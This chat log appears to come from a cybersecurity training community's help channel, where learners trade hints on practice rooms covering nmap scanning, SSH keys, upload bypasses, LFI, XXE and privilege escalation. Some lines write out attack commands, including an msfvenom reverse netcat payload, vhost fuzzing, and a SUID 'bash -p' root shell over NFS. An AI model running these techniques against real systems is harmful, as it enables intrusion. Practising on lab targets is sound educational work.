give me a sec

npnp thx

Gave +1 Rep to @lost canopy

it alows connect without password i think

ssh -i id_rsa cactus@ip

for the -i do we pass it a .pub file or could it be any file that has the key?

for the -i use the id_rsa file

yo I am in, I tried the .pub file it didn't work
I tried the id_rsa_l file -> worked

Thank you @lost canopy

Gave +1 Rep to @lost canopy

btw

what??

for the username, was I supposed to try John then cactus to identify the ssh username orrr?

cactus is the username!!!

After trying unsuccessfully with john, johncactus and jcactus, I successfully connected with cactus:

this👆

Aaah I see!!!

alright, time for telnet now

ok all the best

wait, all ports are closed??

what does that mean

how many ports did you scan?

1000, didn't specify

-p-: Enables scanning across all ports, not just the top 1000

i thought this was hints 😛

All 1000 scanned ports on ip-1fhsdbjk4.eu-west-1.compute.internal (ip) are closed
MAC Address: (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.58 seconds

yikes

wait so it's not 0-1000 but the most 1000 used?

yes

i accidentaly gave an answer

shouldn't telnet be a common port ?

telnet should be abandoned but we can't have what we want canwe lol

tru tru, alright cya!

bye

time to wait for the scan to finish

bye

guys im trying to do the mustacchio room foothold but i cant get any access in and ive got the ||private key of barry user but now matter how i try to copy it i always get this error: ssh barry@10.10.24.2 -i id_rsa
Load key "id_rsa": invalid format
barry@10.10.24.2: Permission denied (publickey) ||

d d a n n what does it mean?

id_rsa = A

a means what?

I got something here 🙂
https://wiki.wireshark.org/SMB2/FileAttributes

i dont get it

:/

See the first character of the values listed there

oww

okey

😄

id_rsa = Archive

SMB File Attributes
- A - Archive
- N - Normal
- D - Directory

yep

thx

Just to complete this little quest 😄
https://serverfault.com/questions/993228/how-do-i-set-the-archive-bit-of-a-file-shared-with-samba#993329

this is the ||id_rsa||

yes

I was kind of losing hope not to do the CTF but today morning when I opened discord it just boosted me with adrenaline and now I conquest the CTF :))

Is it normal for nmap scans using -p- to take a considerable amount of time?

Yes. But you can speed that up with -T4 and should be no issue with THM machines

Thanks for the tip!

Gave +1 Rep to @left thunder

Anyone can help me on NahamStore Task 10 Blind XXE? Thanks very much.

I couldn’t get it to work either, what I did was create a separate python web service and redirect the xxe to go there, hope this helps!

in burp suite room, task 11. having trouble finding a score board on the OWASP juice website or any options that add the mentioned scope locations. any ideas where i'm messing up?

disregard, i did the prior parts of the room on an earlier machine and did not do the challenges (leaving a 0 star review, etc) when creating the new site map on this machine

Tried running this and it just returns the math and not the flag am I missing something? Print(21 + 43)
In the code editor, print the result of 21 + 43. What is the flag?

Can you give more context please? What room/task/question is this for?

@wheat helm Oh, sorry. Sorry python basics task 3 question 1.

Nevermind, figured it out

Hey Finally, I know how to play Blind XXE in xlsx file. Yeah 😆

Thanks @terse eagle

Gave +1 Rep to @terse eagle

you will have to either download/copy the public key into .ssh, or generate it with ssh-keygen -y -f id_rsa > id_rsa.pub

@rigid grove this should solve your error

in the particular situation i was in, (reading it from the box) that wouldnt work but thats probably gonna help me anyways so thanks! Ive moved on from that box tho, so its fine. It seems to work on every other box so i think it might be a one-off

Gave +1 Rep to @lost canopy

Hello. in the content discovery, task 2, I click on the link in the description pane but the link opens locally but inaccessible. If I start in the machine, it does not open either. what shall I do ?

Are you using the attackbox or your local machine ?

I am using attackbox

Then either open the tryhackme room page directly inside your attackbox (only possible if you are sub). Or simply copy the link address, paste it to the attackbox and open the target machine link inside the attackbox

Whaou, I think this is what I did already. I trying again...

I typed manually as I don't know how to paste the link between my local browser and the machine...

Use the copy paste clipboard in between the split view.

Okay !!!

okay !!!

robot.txt is displayed, now! thanks !

Gave +1 Rep to @left thunder

Anyone started the thief room? It was created today.

hile uploadvulns exercise 9 magic number.

*file

I ve been able to upload the hex modified payload. I do not get how to nvigate to the webshell with the uri???? ie with directory indexing off.

Did you try to run a directory enumeration to find the upload directory ?

I get this error i thought it was part of the challenge : Error: error on running gobuster: unable to connect to http://magic.uploadvulns.thm/: Get "http://magic.uploadvulns.thm/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

But you can navigate to the page itself in your browser ?

yes

If you sure your gobuster command was correct, check your /etc/hosts file if you have duplicates in there and get rid of them, so that only the current target machine IP and the host names for that machine are left

ok

thanks @left thunder I am using kali on docker on my windows machine i had to update ip on my kali /etc/hosts. I am able to get enumeration now, how do i reference my webshell with context indexing off?

Gave +1 Rep to @left thunder

Is it really a webshell or a reverse shell? But either way. http://magic.uploadvulns.thm/NameOfUploadFolder/NameOfYourShell

I prefer using a webshell.hmm pretty straightforward. They gave a me a forbidden access for the upload folder, and i though i could not access the file as well. Thanks

thanks again @left thunder

Gave +1 Rep to @left thunder

!d bump

Hi guys, i have a generell question and i'mnot sure were it belongs"

What would you recommand to do after completing complete beginner and jr. Pentester pathway?

I personally would go for the Web Fundamentals path

Thanks alot :)
And after that? I think the path only has a few modules that are not in jr. Pentester or complete beginner. Should i just try an practice with offesive pentesting pathway?

Gave +1 Rep to @left thunder

Tbh it depends what you prefer, but if you are not up to analysis and defence that much, then the offensive pentesting and comptia pentesting paths anyways the only ones left 🙂

I'm actually not sure, since i'm so new in hacking. Maybe i'll just keep trying, learning and poking around and see what i like most :) thanks for the help

room: dogcat
why still no. 3?😑

last flag is still left even after getting the root🤦

working on this room since last 2 days😄 .....simply loved it❤️

yeah, it must be....didn't need help...just wanted to express how I felt not getting the last flag inside /root🙆‍♂️

no, I don't

thanks for asking though

I had a doubt infact

just a min

sure

while I was trying out payloads to get rce from lfi, I used this command 1st as it's given here.......notice that \ before $

and I got this error

later I dropped that \ used for esacaping $ but I had to get new IP to reset everything

wasn't there any other way to get rid of this error?

it persisted in every subsequent request I sent after this command since it was saved in the access.log

the error was in the access.log.....later I reset the machine and didn't use \ and so the command worked for me

yeah

but wasn't there any other way to resolve the error rather than resetting the machine is my question....

but that will only work if \ isn't already inside access.log

once it is

what to do other than resetting the machine

Good morning all. I am attempting the priv esc in Vulnversity. I've almost gotten one technique to work but not sure if I am on the track. I can provide details of what I've done thus far. Any thoughts or ideas would be appreciated.

exactly

got that error several times while testing after I got the RCE (trying out for reverse shell)

the reason for the error isn't just restricted to using \

Could I get some help here. Python basics, task6, question 2. What did I do wrong?

shipping_cost_per_kg = 1.20
customer_basket_cost = 34
customer_basket_weight = 44

if(customer_basket_cost >= 100):
print('Free shipping!')
else:
shipping_cost = customer_basket_weight * shipping_cost_per_kg
customer_basket_cost = 44 * 1.20

print("Total basket cost including shipping is " + str(customer_basket_cost))

Hi there,
at line 9
The customer_basket_cost would be shipping_cost+customer_basket_cost instead of 44 * 1.20

Thank you. I don't know how I missed that.

Gave +1 Rep to @obtuse fjord

it happens😛
I assume you understood the concept now.

I am trying to. Knew the error was on that line. After thinking about it, the numbers were already given. I guess I didn't think it through enough.

but you were multiplying weight with shipping cost per kg which was done on line 8,
you should have added the value from above with customer_basket_cost instead.

Understood. Thank you for the clarification.

Gave +1 Rep to @obtuse fjord

hi

I am in
Network Services

Task 6 - the telnet part
I first did
"nmap <the_ip>"
all were closed, so now I tried doing
"nmap <the_ip> -p-" to scan all, but this will take forever, so I was thinking about if this is the right step orr?

if they all showed up as closed you could try -Pn ....or to speed up the -p- scan you could slap on --min-rate=10000 or some abysmal number, but that could result in some missed ports, just be aware of that posibility

XD ARIGATO !!
lmao, been waiting for the -p- to finish for like 15 mins, I used the --min-rate=10000 and now am done LoL

Based on the title returned to us, what do we think this port could be used for?

what title is it talking aboit?

hey I'm stuck in the file inclusion room task 5 question 4. could i get some help?

You're missing a flag or two for more details in your nmap scan results. check "man nmap" and try to find what could be useful

nevermind I figured it on my own!

Intro to Django task2 when I run this command django-admin startproject {project_name} I get an error. Invalid project name. I tried making up one and still got the error. any help is appreciated.

Im in the Username Enumeration room and i am just unfamiliar with how to save my fuff command as a .txt file...(ive guess all the usernames tho) but i want to make sure i have the file for the rest of the exercises.

nm figured it out 🙂

Hello, am working on zthobscurewebvulns: task 22, and I can't get my payload to work,

I have tried using the entity created on every element but nothing is working, can anyone point out what I'm doing wrong?

i worked it out, just a simple mistake

Hi, I was working on the marketplace room. I have managed to get the initial foothold, but was unable to laterally escalate my privileges to the michael user. I have tried the wildcard injection for tar, but it's not working for some reason. Any help would be appreciated

doing the pickle rick room rn got to the login page but cant find any other leads

so no ssh needed for now, gobuster is still running

saw the robots.txt but didnt see anything that i thought would be anything

if i got the user i could prob use something like hydra right?

oh

hahaha

damnit

alright

lemme check the website pages again

alright

Used this command to get the payload -> msfvenom -p cmd/unix/reverse_netcat lhost=xx.x.xxx.xxx lport=4444 R

cant use it to login tho

lemme try using it as a user for ssh

hmm

Was following this article only

And used as it is mentioned there

sudo -u michael /opt/backups/backup.sh

how do i set something as a spoiler again

Used this command to run the script but the shell is just not popping up on my netcat

got the ||index.html, robots.txt and login.php|| idk if those are all thats needed rn?

then what the hell am i missing XD

....

im so stupid

thanks very much

Yeah got it. I got so frustrated, that I didn't think about chmod, I was using chown, F.

Thanks 😄

Gave +1 Rep to @dusk totem

@white salmon is it right that i cant cd to locations with this command terminal?

i found the second one tho, but cant open it, or atleast dont know how to for now

it has no extension and cat doesnt work

wait

you can, it will go through, but it wont save your changed location again. each time you send a command it will reset your location to the default one.

if it has no extension it must be a dir

ahh like that

the dir theory wasnt right

hmm

the directory from which you issue a command will be static at all times, so you might want to chain commands together.

so try to use the pipeline?

ah ';' would work here then

got it, i was too stupid to use use ' ' for a space in file name

got that it was ascii text via file

do i need the ssh for the last one?

ooh, alright!!

Any hints or something for reading about the nmap commands (a one that is different than nmap.org, a one that looks bettter are least lol)

nmap -h or man nmap

In Network Services, Task 6, what exactly are they asking for in:

Based on the title returned to us, what do we think this port could be used for?

;-; = 🥲

aren't some sites better?

I'm not sure what you deem as better. I guess there is no site as detailed as nmap.org itself. But I don't know, so you might have to research that on your own, but the man page or nmap -h should provide you with enough infos.

If you conduct the correct scan, I guess you will know what they are asking for. So go for a more advanced scan on the open port you found

Working on it!

@left thunder

I did

nmap <the ip> -p 8012 -sV 

As I think-sV would help, but it's returning something very big, is that ok?

Any hints on what that extra parameter is?

Okay, within that "big" reply, you should be able to see what that port is used for 🙂

Extra parameter? You mean the -sV flag ?

other than the -sV orr thats what am supposed to use?

Ye, with the -sV flag you should be able to get the desired result. But you could send a screenshot of your scan result in here, in order for me to verify it worked properly as that machine sometimes is a bit finicky. Just delete it afterwards again or put spoiler tags on that screenshot

||checking if this is how you send a hidden msg||

oh i c

@left thunder is this what I am supposed to see?

Yup. Maybe the answer format confuses you a bit. So it's just what you can find in that result and put it in the answer like "a banana" or "a car" etc.

Found it XD !!!

btw,

|| S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20view\ ||

why does it look like its some address of folders or something?

I don't know unfortunately. But maybe consider putting that in spoilers too 🙂

wait one more question

@left thunder
Now I have seen that it's a ||backdoor||, how did I determine that's its a ||telnet port||?
what's meant by ||backdoor||

Hi Team, I dont know if someone can fire me over a hint (new to linux CLI btw). Trying to run the following command in Room Network Services 2 from the tmp/mount: mount -t nfs (IP) /tmp/mount -nolock. I am getting error 'can't find in /etc/fstab' any hints most welcome (figured it out ignore pls)

I am Network Services 1
XD

Haha yeh just finished that @slim violet

could you help in #room-help

Just wanna check something

ofc

thanks!

Gave +1 Rep to @vernal plank

im doing the team room

seems like gobuster isnt giving anything useful and cant login to ftp anonymously

anyone got a hint on what i should do?

doing that with gobuster but its not giving much

icons and small is all im getting atm

ah hold on

never done that

thought they were the same thing

yeah i noticed now

XD

which tool do you suggest on kali?

do i need some wordlists or are those in the /usr/share/wordlist folder

@white salmon could you help me?

using -w /usr/share/seclists/fuzzing/fuzzing-boom.txt -u http://10.10.68.133/FUZZ

as command

|| gobuster vhost -u http://ip -w /usr/share/seclists/discovery/dns/<pick your poison>.txt || OR || ffuf -w subdomains.txt -u https://website.com -H "Host: FUZZ.website.com"|| I'm assuming you couldn't find the correct wordlist

hi i'm on upload vulns task 9, trying to upload a shell to magic.uploadvulns.thm. i have already changed the hex numbers to spoof a ||.gif|| file, verified by 'file' command, but when i attempt to actually upload the shell i'm getting a submit=failure / no file selected error, any ideas where i'm going wrong?

once again killing the machine / starting a new one fixed it, going forward i'll try that for my weird errors LOL

Quick question about the file inclusion room

I had to use 8 ../ to see etc/passwd

Is there any way to know how many times you have to go back in the directory or is just a shot in the dark

most of the time you don't know the directory structure of the host so doing enough of them ensures you're in the root of it.

Also, in the same room I'm using the command ssh -i id_rsa ||falcon||@ip and getting the error "load key invalid format". I've copy pasted the the rsa from source code and did chmod 600 so I dunno what the problem is

is the private key properly formatted ?

The end rsa private key isn't indented

it requires a newline at the end

And at the top?

should start with the key

May I send a picture of it?

yes but obscure the key and only show the relevant parts

hmm I think the space in front of begin and end is bothering ssh

Thanks a ton

Gave +1 Rep to @grave valve

you're welcome

Phishing

@ripe hedge

sorted (: ty @white salmon

Hi. I'm blocked in the Network Services 2, Task 4 Exploiting NFS. I think my problem is to login with SSH

if you're having problems with ssh, you haven't completed task3 yet

I'm here:

And then i should do this:
Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Lets run it with "./bash -p"

I done task 3, but if i try it says:

cappucino@<ip> not admin, you set up a shared NFS with the user cappucino, the id_rsa was for cappucino

Ok. But i got this, and don't know where to search for the flag:

if you do a "whoami" you'll see you're root, if you did everything correctly... based on past experiences, where has the last flag been?

It's always there.. but there is not and i looked in the folders and can't find it:

1. confirm which directory you're in right now, by doing ||pwd||
2. which directory is the root flag located based on your experience?

thanks @flat juniper

i done linux basis but seems i should improve more. I get stucked in understanding basis

hello, i'm working on the uploadvulns room jewel challenge, and i'm able to get my file with a payload uploaded to the site, but it returns this error instead of activating a shell. also here is the response i'm getting in burpsuite when trying to load that file. any ideas where i'm messing up? i think it might be the payload itself, gonna search around for some others

To find what services are running on a machine using nmap, do I have to specify open ports?